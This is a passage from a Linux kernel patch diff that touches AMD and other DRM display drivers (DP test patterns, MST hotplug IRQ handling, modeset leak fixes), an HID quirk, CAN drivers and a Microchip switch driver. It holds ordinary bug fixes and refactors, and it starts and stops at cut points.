+ 	struct dc_link *link,
+ 	union hpd_irq_data *irq_data)
+ {
+@@ -4264,124 +4264,6 @@ static void dp_test_send_phy_test_pattern(struct dc_link *link)
+ 		test_pattern_size);
+ }
+ 
+-static void dp_test_send_link_test_pattern(struct dc_link *link)
+-{
+-	union link_test_pattern dpcd_test_pattern;
+-	union test_misc dpcd_test_params;
+-	enum dp_test_pattern test_pattern;
+-	enum dp_test_pattern_color_space test_pattern_color_space =
+-			DP_TEST_PATTERN_COLOR_SPACE_UNDEFINED;
+-	enum dc_color_depth requestColorDepth = COLOR_DEPTH_UNDEFINED;
+-	struct pipe_ctx *pipes = link->dc->current_state->res_ctx.pipe_ctx;
+-	struct pipe_ctx *pipe_ctx = NULL;
+-	int i;
+-
+-	memset(&dpcd_test_pattern, 0, sizeof(dpcd_test_pattern));
+-	memset(&dpcd_test_params, 0, sizeof(dpcd_test_params));
+-
+-	for (i = 0; i < MAX_PIPES; i++) {
+-		if (pipes[i].stream == NULL)
+-			continue;
+-
+-		if (pipes[i].stream->link == link && !pipes[i].top_pipe && !pipes[i].prev_odm_pipe) {
+-			pipe_ctx = &pipes[i];
+-			break;
+-		}
+-	}
+-
+-	if (pipe_ctx == NULL)
+-		return;
+-
+-	/* get link test pattern and pattern parameters */
+-	core_link_read_dpcd(
+-			link,
+-			DP_TEST_PATTERN,
+-			&dpcd_test_pattern.raw,
+-			sizeof(dpcd_test_pattern));
+-	core_link_read_dpcd(
+-			link,
+-			DP_TEST_MISC0,
+-			&dpcd_test_params.raw,
+-			sizeof(dpcd_test_params));
+-
+-	switch (dpcd_test_pattern.bits.PATTERN) {
+-	case LINK_TEST_PATTERN_COLOR_RAMP:
+-		test_pattern = DP_TEST_PATTERN_COLOR_RAMP;
+-	break;
+-	case LINK_TEST_PATTERN_VERTICAL_BARS:
+-		test_pattern = DP_TEST_PATTERN_VERTICAL_BARS;
+-	break; /* black and white */
+-	case LINK_TEST_PATTERN_COLOR_SQUARES:
+-		test_pattern = (dpcd_test_params.bits.DYN_RANGE ==
+-				TEST_DYN_RANGE_VESA ?
+-				DP_TEST_PATTERN_COLOR_SQUARES :
+-				DP_TEST_PATTERN_COLOR_SQUARES_CEA);
+-	break;
+-	default:
+-		test_pattern = DP_TEST_PATTERN_VIDEO_MODE;
+-	break;
+-	}
+-
+-	if (dpcd_test_params.bits.CLR_FORMAT == 0)
+-		test_pattern_color_space = DP_TEST_PATTERN_COLOR_SPACE_RGB;
+-	else
+-		test_pattern_color_space = dpcd_test_params.bits.YCBCR_COEFS ?
+-				DP_TEST_PATTERN_COLOR_SPACE_YCBCR709 :
+-				DP_TEST_PATTERN_COLOR_SPACE_YCBCR601;
+-
+-	switch (dpcd_test_params.bits.BPC) {
+-	case 0: // 6 bits
+-		requestColorDepth = COLOR_DEPTH_666;
+-		break;
+-	case 1: // 8 bits
+-		requestColorDepth = COLOR_DEPTH_888;
+-		break;
+-	case 2: // 10 bits
+-		requestColorDepth = COLOR_DEPTH_101010;
+-		break;
+-	case 3: // 12 bits
+-		requestColorDepth = COLOR_DEPTH_121212;
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	switch (dpcd_test_params.bits.CLR_FORMAT) {
+-	case 0:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_RGB;
+-		break;
+-	case 1:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_YCBCR422;
+-		break;
+-	case 2:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_YCBCR444;
+-		break;
+-	default:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_RGB;
+-		break;
+-	}
+-
+-
+-	if (requestColorDepth != COLOR_DEPTH_UNDEFINED
+-			&& pipe_ctx->stream->timing.display_color_depth != requestColorDepth) {
+-		DC_LOG_DEBUG("%s: original bpc %d, changing to %d\n",
+-				__func__,
+-				pipe_ctx->stream->timing.display_color_depth,
+-				requestColorDepth);
+-		pipe_ctx->stream->timing.display_color_depth = requestColorDepth;
+-	}
+-
+-	dp_update_dsc_config(pipe_ctx);
+-
+-	dc_link_dp_set_test_pattern(
+-			link,
+-			test_pattern,
+-			test_pattern_color_space,
+-			NULL,
+-			NULL,
+-			0);
+-}
+-
+ static void dp_test_get_audio_test_data(struct dc_link *link, bool disable_video)
+ {
+ 	union audio_test_mode            dpcd_test_mode = {0};
+@@ -4494,8 +4376,25 @@ void dc_link_dp_handle_automated_test(struct dc_link *link)
+ 		test_response.bits.ACK = 0;
+ 	}
+ 	if (test_request.bits.LINK_TEST_PATTRN) {
+-		dp_test_send_link_test_pattern(link);
+-		test_response.bits.ACK = 1;
++		union test_misc dpcd_test_params;
++		union link_test_pattern dpcd_test_pattern;
++
++		memset(&dpcd_test_pattern, 0, sizeof(dpcd_test_pattern));
++		memset(&dpcd_test_params, 0, sizeof(dpcd_test_params));
++
++		/* get link test pattern and pattern parameters */
++		core_link_read_dpcd(
++				link,
++				DP_TEST_PATTERN,
++				&dpcd_test_pattern.raw,
++				sizeof(dpcd_test_pattern));
++		core_link_read_dpcd(
++				link,
++				DP_TEST_MISC0,
++				&dpcd_test_params.raw,
++				sizeof(dpcd_test_params));
++		test_response.bits.ACK = dm_helpers_dp_handle_test_pattern_request(link->ctx, link,
++				dpcd_test_pattern, dpcd_test_params) ? 1 : 0;
+ 	}
+ 
+ 	if (test_request.bits.AUDIO_TEST_PATTERN) {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 0dcd9fea122d0..a6fde27d13479 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3293,7 +3293,8 @@ void dcn10_wait_for_mpcc_disconnect(
+ 		if (pipe_ctx->stream_res.opp->mpcc_disconnect_pending[mpcc_inst]) {
+ 			struct hubp *hubp = get_hubp_by_inst(res_pool, mpcc_inst);
+ 
+-			if (pipe_ctx->stream_res.tg->funcs->is_tg_enabled(pipe_ctx->stream_res.tg))
++			if (pipe_ctx->stream_res.tg &&
++				pipe_ctx->stream_res.tg->funcs->is_tg_enabled(pipe_ctx->stream_res.tg))
+ 				res_pool->mpc->funcs->wait_for_idle(res_pool->mpc, mpcc_inst);
+ 			pipe_ctx->stream_res.opp->mpcc_disconnect_pending[mpcc_inst] = false;
+ 			hubp->funcs->set_blank(hubp, true);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+index 7e7f18bef0986..1f263326cdf9e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+@@ -65,7 +65,7 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 		.timing_trace = false,
+ 		.clock_trace = true,
+ 		.disable_pplib_clock_request = true,
+-		.pipe_split_policy = MPC_SPLIT_DYNAMIC,
++		.pipe_split_policy = MPC_SPLIT_AVOID,
+ 		.force_single_disp_pipe_split = false,
+ 		.disable_dcc = DCC_ENABLE,
+ 		.vsr_support = true,
+diff --git a/drivers/gpu/drm/amd/display/dc/dm_helpers.h b/drivers/gpu/drm/amd/display/dc/dm_helpers.h
+index e3e5c39895a3a..d0ad682fdde8f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dm_helpers.h
++++ b/drivers/gpu/drm/amd/display/dc/dm_helpers.h
+@@ -156,6 +156,12 @@ enum dc_edid_status dm_helpers_read_local_edid(
+ 		struct dc_link *link,
+ 		struct dc_sink *sink);
+ 
++bool dm_helpers_dp_handle_test_pattern_request(
++		struct dc_context *ctx,
++		const struct dc_link *link,
++		union link_test_pattern dpcd_test_pattern,
++		union test_misc dpcd_test_params);
++
+ void dm_set_dcn_clocks(
+ 		struct dc_context *ctx,
+ 		struct dc_clocks *clks);
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h b/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h
+index b304d450b038a..d60d93ed7df0c 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h
+@@ -82,6 +82,10 @@ bool perform_link_training_with_retries(
+ 	enum signal_type signal,
+ 	bool do_fallback);
+ 
++enum dc_status read_hpd_rx_irq_data(
++	struct dc_link *link,
++	union hpd_irq_data *irq_data);
++
+ bool hpd_rx_irq_check_link_loss_status(
+ 	struct dc_link *link,
+ 	union hpd_irq_data *hpd_irq_dpcd_data);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index f7ed3e655e397..1b7d93709a352 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -1927,12 +1927,16 @@ static int sienna_cichlid_read_sensor(struct smu_context *smu,
+ 		*size = 4;
+ 		break;
+ 	case AMDGPU_PP_SENSOR_GFX_MCLK:
+-		ret = sienna_cichlid_get_current_clk_freq_by_table(smu, SMU_UCLK, (uint32_t *)data);
++		ret = sienna_cichlid_get_smu_metrics_data(smu,
++							  METRICS_CURR_UCLK,
++							  (uint32_t *)data);
+ 		*(uint32_t *)data *= 100;
+ 		*size = 4;
+ 		break;
+ 	case AMDGPU_PP_SENSOR_GFX_SCLK:
+-		ret = sienna_cichlid_get_current_clk_freq_by_table(smu, SMU_GFXCLK, (uint32_t *)data);
++		ret = sienna_cichlid_get_smu_metrics_data(smu,
++							  METRICS_AVERAGE_GFXCLK,
++							  (uint32_t *)data);
+ 		*(uint32_t *)data *= 100;
+ 		*size = 4;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index d980eff2b6166..bf24850027dab 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -940,7 +940,7 @@ static int smu_v13_0_7_read_sensor(struct smu_context *smu,
+ 		break;
+ 	case AMDGPU_PP_SENSOR_GFX_MCLK:
+ 		ret = smu_v13_0_7_get_smu_metrics_data(smu,
+-						       METRICS_AVERAGE_UCLK,
++						       METRICS_CURR_UCLK,
+ 						       (uint32_t *)data);
+ 		*(uint32_t *)data *= 100;
+ 		*size = 4;
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index e2e21ce79510e..f854cb5eafbe7 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -4053,17 +4053,28 @@ out:
+ }
+ 
+ /**
+- * drm_dp_mst_hpd_irq() - MST hotplug IRQ notify
++ * drm_dp_mst_hpd_irq_handle_event() - MST hotplug IRQ handle MST event
+  * @mgr: manager to notify irq for.
+  * @esi: 4 bytes from SINK_COUNT_ESI
++ * @ack: 4 bytes used to ack events starting from SINK_COUNT_ESI
+  * @handled: whether the hpd interrupt was consumed or not
+  *
+- * This should be called from the driver when it detects a short IRQ,
++ * This should be called from the driver when it detects a HPD IRQ,
+  * along with the value of the DEVICE_SERVICE_IRQ_VECTOR_ESI0. The
+- * topology manager will process the sideband messages received as a result
+- * of this.
++ * topology manager will process the sideband messages received
++ * as indicated in the DEVICE_SERVICE_IRQ_VECTOR_ESI0 and set the
++ * corresponding flags that Driver has to ack the DP receiver later.
++ *
++ * Note that driver shall also call
++ * drm_dp_mst_hpd_irq_send_new_request() if the 'handled' is set
++ * after calling this function, to try to kick off a new request in
++ * the queue if the previous message transaction is completed.
++ *
++ * See also:
++ * drm_dp_mst_hpd_irq_send_new_request()
+  */
+-int drm_dp_mst_hpd_irq(struct drm_dp_mst_topology_mgr *mgr, u8 *esi, bool *handled)
++int drm_dp_mst_hpd_irq_handle_event(struct drm_dp_mst_topology_mgr *mgr, const u8 *esi,
++				    u8 *ack, bool *handled)
+ {
+ 	int ret = 0;
+ 	int sc;
+@@ -4078,18 +4089,47 @@ int drm_dp_mst_hpd_irq(struct drm_dp_mst_topology_mgr *mgr, u8 *esi, bool *handl
+ 	if (esi[1] & DP_DOWN_REP_MSG_RDY) {
+ 		ret = drm_dp_mst_handle_down_rep(mgr);
+ 		*handled = true;
++		ack[1] |= DP_DOWN_REP_MSG_RDY;
+ 	}
+ 
+ 	if (esi[1] & DP_UP_REQ_MSG_RDY) {
+ 		ret |= drm_dp_mst_handle_up_req(mgr);
+ 		*handled = true;
++		ack[1] |= DP_UP_REQ_MSG_RDY;
+ 	}
+ 
+-	drm_dp_mst_kick_tx(mgr);
+ 	return ret;
+ }
+-EXPORT_SYMBOL(drm_dp_mst_hpd_irq);
++EXPORT_SYMBOL(drm_dp_mst_hpd_irq_handle_event);
+ 
++/**
++ * drm_dp_mst_hpd_irq_send_new_request() - MST hotplug IRQ kick off new request
++ * @mgr: manager to notify irq for.
++ *
++ * This should be called from the driver when mst irq event is handled
++ * and acked. Note that new down request should only be sent when
++ * previous message transaction is completed. Source is not supposed to generate
++ * interleaved message transactions.
++ */
++void drm_dp_mst_hpd_irq_send_new_request(struct drm_dp_mst_topology_mgr *mgr)
++{
++	struct drm_dp_sideband_msg_tx *txmsg;
++	bool kick = true;
++
++	mutex_lock(&mgr->qlock);
++	txmsg = list_first_entry_or_null(&mgr->tx_msg_downq,
++					 struct drm_dp_sideband_msg_tx, next);
++	/* If last transaction is not completed yet*/
++	if (!txmsg ||
++	    txmsg->state == DRM_DP_SIDEBAND_TX_START_SEND ||
++	    txmsg->state == DRM_DP_SIDEBAND_TX_SENT)
++		kick = false;
++	mutex_unlock(&mgr->qlock);
++
++	if (kick)
++		drm_dp_mst_kick_tx(mgr);
++}
++EXPORT_SYMBOL(drm_dp_mst_hpd_irq_send_new_request);
+ /**
+  * drm_dp_mst_detect_port() - get connection status for an MST port
+  * @connector: DRM connector for this port
+diff --git a/drivers/gpu/drm/drm_client_modeset.c b/drivers/gpu/drm/drm_client_modeset.c
+index bbc535cc50dd1..7847020de0a49 100644
+--- a/drivers/gpu/drm/drm_client_modeset.c
++++ b/drivers/gpu/drm/drm_client_modeset.c
+@@ -315,6 +315,9 @@ static bool drm_client_target_cloned(struct drm_device *dev,
+ 	can_clone = true;
+ 	dmt_mode = drm_mode_find_dmt(dev, 1024, 768, 60, false);
+ 
++	if (!dmt_mode)
++		goto fail;
++
+ 	for (i = 0; i < connector_count; i++) {
+ 		if (!enabled[i])
+ 			continue;
+@@ -330,11 +333,13 @@ static bool drm_client_target_cloned(struct drm_device *dev,
+ 		if (!modes[i])
+ 			can_clone = false;
+ 	}
++	kfree(dmt_mode);
+ 
+ 	if (can_clone) {
+ 		DRM_DEBUG_KMS("can clone using 1024x768\n");
+ 		return true;
+ 	}
++fail:
+ 	DRM_INFO("kms: can't enable cloning when we probably wanted to.\n");
+ 	return false;
+ }
+@@ -866,6 +871,7 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 				break;
+ 			}
+ 
++			kfree(modeset->mode);
+ 			modeset->mode = drm_mode_duplicate(dev, mode);
+ 			drm_connector_get(connector);
+ 			modeset->connectors[modeset->num_connectors++] = connector;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index b1653308f1450..594ea037050a9 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -3804,9 +3804,7 @@ intel_dp_mst_hpd_irq(struct intel_dp *intel_dp, u8 *esi, u8 *ack)
+ {
+ 	bool handled = false;
+ 
+-	drm_dp_mst_hpd_irq(&intel_dp->mst_mgr, esi, &handled);
+-	if (handled)
+-		ack[1] |= esi[1] & (DP_DOWN_REP_MSG_RDY | DP_UP_REQ_MSG_RDY);
++	drm_dp_mst_hpd_irq_handle_event(&intel_dp->mst_mgr, esi, ack, &handled);
+ 
+ 	if (esi[1] & DP_CP_IRQ) {
+ 		intel_hdcp_handle_cp_irq(intel_dp->attached_connector);
+@@ -3881,6 +3879,9 @@ intel_dp_check_mst_status(struct intel_dp *intel_dp)
+ 
+ 		if (!intel_dp_ack_sink_irq_esi(intel_dp, ack))
+ 			drm_dbg_kms(&i915->drm, "Failed to ack ESI\n");
++
++		if (ack[1] & (DP_DOWN_REP_MSG_RDY | DP_UP_REQ_MSG_RDY))
++			drm_dp_mst_hpd_irq_send_new_request(&intel_dp->mst_mgr);
+ 	}
+ 
+ 	return link_ok;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index 006cb76adaa93..a851354c0c5f8 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -1473,22 +1473,26 @@ nv50_mstm_service(struct nouveau_drm *drm,
+ 	u8 esi[8] = {};
+ 
+ 	while (handled) {
++		u8 ack[8] = {};
++
+ 		rc = drm_dp_dpcd_read(aux, DP_SINK_COUNT_ESI, esi, 8);
+ 		if (rc != 8) {
+ 			ret = false;
+ 			break;
+ 		}
+ 
+-		drm_dp_mst_hpd_irq(&mstm->mgr, esi, &handled);
++		drm_dp_mst_hpd_irq_handle_event(&mstm->mgr, esi, ack, &handled);
+ 		if (!handled)
+ 			break;
+ 
+-		rc = drm_dp_dpcd_write(aux, DP_SINK_COUNT_ESI + 1, &esi[1],
+-				       3);
+-		if (rc != 3) {
++		rc = drm_dp_dpcd_writeb(aux, DP_SINK_COUNT_ESI + 1, ack[1]);
++
++		if (rc != 1) {
+ 			ret = false;
+ 			break;
+ 		}
++
++		drm_dp_mst_hpd_irq_send_new_request(&mstm->mgr);
+ 	}
+ 
+ 	if (!ret)
+diff --git a/drivers/gpu/drm/radeon/radeon_cs.c b/drivers/gpu/drm/radeon/radeon_cs.c
+index 446f7bae54c4e..e3664f65d1a9c 100644
+--- a/drivers/gpu/drm/radeon/radeon_cs.c
++++ b/drivers/gpu/drm/radeon/radeon_cs.c
+@@ -270,7 +270,8 @@ int radeon_cs_parser_init(struct radeon_cs_parser *p, void *data)
+ {
+ 	struct drm_radeon_cs *cs = data;
+ 	uint64_t *chunk_array_ptr;
+-	unsigned size, i;
++	u64 size;
++	unsigned i;
+ 	u32 ring = RADEON_CS_RING_GFX;
+ 	s32 priority = 0;
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_resource.c b/drivers/gpu/drm/ttm/ttm_resource.c
+index a729c32a1e48a..3287032a2f8e8 100644
+--- a/drivers/gpu/drm/ttm/ttm_resource.c
++++ b/drivers/gpu/drm/ttm/ttm_resource.c
+@@ -85,6 +85,8 @@ static void ttm_lru_bulk_move_pos_tail(struct ttm_lru_bulk_move_pos *pos,
+ 				       struct ttm_resource *res)
+ {
+ 	if (pos->last != res) {
++		if (pos->first == res)
++			pos->first = list_next_entry(res, lru);
+ 		list_move(&res->lru, &pos->last->lru);
+ 		pos->last = res;
+ 	}
+@@ -110,7 +112,8 @@ static void ttm_lru_bulk_move_del(struct ttm_lru_bulk_move *bulk,
+ {
+ 	struct ttm_lru_bulk_move_pos *pos = ttm_lru_bulk_move_pos(bulk, res);
+ 
+-	if (unlikely(pos->first == res && pos->last == res)) {
++	if (unlikely(WARN_ON(!pos->first || !pos->last) ||
++		     (pos->first == res && pos->last == res))) {
+ 		pos->first = NULL;
+ 		pos->last = NULL;
+ 	} else if (pos->first == res) {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 653db6cdab579..9a17e5cc3539b 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -614,6 +614,7 @@
+ #define USB_DEVICE_ID_UGCI_FIGHTING	0x0030
+ 
+ #define USB_VENDOR_ID_HP		0x03f0
++#define USB_PRODUCT_ID_HP_ELITE_PRESENTER_MOUSE_464A		0x464a
+ #define USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0A4A	0x0a4a
+ #define USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0B4A	0x0b4a
+ #define USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE		0x134a
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 66e64350f1386..f8f20a7c24b17 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -96,6 +96,7 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HOLTEK_ALT, USB_DEVICE_ID_HOLTEK_ALT_KEYBOARD_A096), HID_QUIRK_NO_INIT_REPORTS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HOLTEK_ALT, USB_DEVICE_ID_HOLTEK_ALT_KEYBOARD_A293), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0A4A), HID_QUIRK_ALWAYS_POLL },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_ELITE_PRESENTER_MOUSE_464A), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0B4A), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE_094A), HID_QUIRK_ALWAYS_POLL },
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index 68df6d4641b5c..eebf967f4711a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -227,6 +227,8 @@ static int
+ __mcp251xfd_chip_set_mode(const struct mcp251xfd_priv *priv,
+ 			  const u8 mode_req, bool nowait)
+ {
++	const struct can_bittiming *bt = &priv->can.bittiming;
++	unsigned long timeout_us = MCP251XFD_POLL_TIMEOUT_US;
+ 	u32 con = 0, con_reqop, osc = 0;
+ 	u8 mode;
+ 	int err;
+@@ -246,12 +248,16 @@ __mcp251xfd_chip_set_mode(const struct mcp251xfd_priv *priv,
+ 	if (mode_req == MCP251XFD_REG_CON_MODE_SLEEP || nowait)
+ 		return 0;
+ 
++	if (bt->bitrate)
++		timeout_us = max_t(unsigned long, timeout_us,
++				   MCP251XFD_FRAME_LEN_MAX_BITS * USEC_PER_SEC /
++				   bt->bitrate);
++
+ 	err = regmap_read_poll_timeout(priv->map_reg, MCP251XFD_REG_CON, con,
+ 				       !mcp251xfd_reg_invalid(con) &&
+ 				       FIELD_GET(MCP251XFD_REG_CON_OPMOD_MASK,
+ 						 con) == mode_req,
+-				       MCP251XFD_POLL_SLEEP_US,
+-				       MCP251XFD_POLL_TIMEOUT_US);
++				       MCP251XFD_POLL_SLEEP_US, timeout_us);
+ 	if (err != -ETIMEDOUT && err != -EBADMSG)
+ 		return err;
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index 2b0309fedfac5..ba0fd2b95a52a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -387,6 +387,7 @@ static_assert(MCP251XFD_TIMESTAMP_WORK_DELAY_SEC <
+ #define MCP251XFD_OSC_STAB_TIMEOUT_US (10 * MCP251XFD_OSC_STAB_SLEEP_US)
+ #define MCP251XFD_POLL_SLEEP_US (10)
+ #define MCP251XFD_POLL_TIMEOUT_US (USEC_PER_MSEC)
++#define MCP251XFD_FRAME_LEN_MAX_BITS (736)
+ 
+ /* Misc */
+ #define MCP251XFD_NAPI_WEIGHT 32
+diff --git a/drivers/net/can/usb/gs_usb.c b/drivers/net/can/usb/gs_usb.c
+index 9c2c25fde3d14..fe532d5048897 100644
+--- a/drivers/net/can/usb/gs_usb.c
++++ b/drivers/net/can/usb/gs_usb.c
+@@ -833,6 +833,7 @@ static int gs_can_open(struct net_device *netdev)
+ 		.mode = cpu_to_le32(GS_CAN_MODE_START),
+ 	};
+ 	struct gs_host_frame *hf;
++	struct urb *urb = NULL;
+ 	u32 ctrlmode;
+ 	u32 flags = 0;
+ 	int rc, i;
+@@ -858,13 +859,14 @@ static int gs_can_open(struct net_device *netdev)
+ 
+ 	if (!parent->active_channels) {
+ 		for (i = 0; i < GS_MAX_RX_URBS; i++) {
+-			struct urb *urb;
+ 			u8 *buf;
+ 
+ 			/* alloc rx urb */
+ 			urb = usb_alloc_urb(0, GFP_KERNEL);
+-			if (!urb)
+-				return -ENOMEM;
++			if (!urb) {
++				rc = -ENOMEM;
++				goto out_usb_kill_anchored_urbs;
++			}
+ 
+ 			/* alloc rx buffer */
+ 			buf = kmalloc(dev->parent->hf_size_rx,
+@@ -872,8 +874,8 @@ static int gs_can_open(struct net_device *netdev)
+ 			if (!buf) {
+ 				netdev_err(netdev,
+ 					   "No memory left for USB buffer\n");
+-				usb_free_urb(urb);
+-				return -ENOMEM;
++				rc = -ENOMEM;
++				goto out_usb_free_urb;
+ 			}
+ 
+ 			/* fill, anchor, and submit rx urb */
+@@ -896,9 +898,7 @@ static int gs_can_open(struct net_device *netdev)
+ 				netdev_err(netdev,
+ 					   "usb_submit failed (err=%d)\n", rc);
+ 
+-				usb_unanchor_urb(urb);
+-				usb_free_urb(urb);
+-				break;
++				goto out_usb_unanchor_urb;
+ 			}
+ 
+ 			/* Drop reference,
+@@ -944,7 +944,8 @@ static int gs_can_open(struct net_device *netdev)
+ 		if (dev->feature & GS_CAN_FEATURE_HW_TIMESTAMP)
+ 			gs_usb_timestamp_stop(dev);
+ 		dev->can.state = CAN_STATE_STOPPED;
+-		return rc;
++
++		goto out_usb_kill_anchored_urbs;
+ 	}
+ 
+ 	parent->active_channels++;
+@@ -952,6 +953,18 @@ static int gs_can_open(struct net_device *netdev)
+ 		netif_start_queue(netdev);
+ 
+ 	return 0;
++
++out_usb_unanchor_urb:
++	usb_unanchor_urb(urb);
++out_usb_free_urb:
++	usb_free_urb(urb);
++out_usb_kill_anchored_urbs:
++	if (!parent->active_channels)
++		usb_kill_anchored_urbs(&dev->tx_submitted);
++
++	close_candev(netdev);
++
++	return rc;
+ }
+ 
+ static int gs_can_close(struct net_device *netdev)
+diff --git a/drivers/net/dsa/microchip/ksz8.h b/drivers/net/dsa/microchip/ksz8.h
+index 8582b4b67d989..28137c4bf2928 100644
+--- a/drivers/net/dsa/microchip/ksz8.h
++++ b/drivers/net/dsa/microchip/ksz8.h
+@@ -21,8 +21,6 @@ int ksz8_r_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 *val);
+ int ksz8_w_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 val);
+ int ksz8_r_dyn_mac_table(struct ksz_device *dev, u16 addr, u8 *mac_addr,
+ 			 u8 *fid, u8 *src_port, u8 *timestamp, u16 *entries);
+-int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
+-			 struct alu_struct *alu);
+ void ksz8_w_sta_mac_table(struct ksz_device *dev, u16 addr,
+ 			  struct alu_struct *alu);
+ void ksz8_r_mib_cnt(struct ksz_device *dev, int port, u16 addr, u64 *cnt);
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index 22250ae222b5b..c63e082dc57dc 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -406,8 +406,8 @@ int ksz8_r_dyn_mac_table(struct ksz_device *dev, u16 addr, u8 *mac_addr,
+ 	return rc;
+ }
+ 
+-int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
+-			 struct alu_struct *alu)
++static int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
++				struct alu_struct *alu, bool *valid)
+ {
+ 	u32 data_hi, data_lo;
+ 	const u8 *shifts;
+@@ -420,28 +420,38 @@ int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
+ 	ksz8_r_table(dev, TABLE_STATIC_MAC, addr, &data);
+ 	data_hi = data >> 32;
+ 	data_lo = (u32)data;
+-	if (data_hi & (masks[STATIC_MAC_TABLE_VALID] |
+-			masks[STATIC_MAC_TABLE_OVERRIDE])) {
+-		alu->mac[5] = (u8)data_lo;
+-		alu->mac[4] = (u8)(data_lo >> 8);
+-		alu->mac[3] = (u8)(data_lo >> 16);
+-		alu->mac[2] = (u8)(data_lo >> 24);
+-		alu->mac[1] = (u8)data_hi;
+-		alu->mac[0] = (u8)(data_hi >> 8);
+-		alu->port_forward =
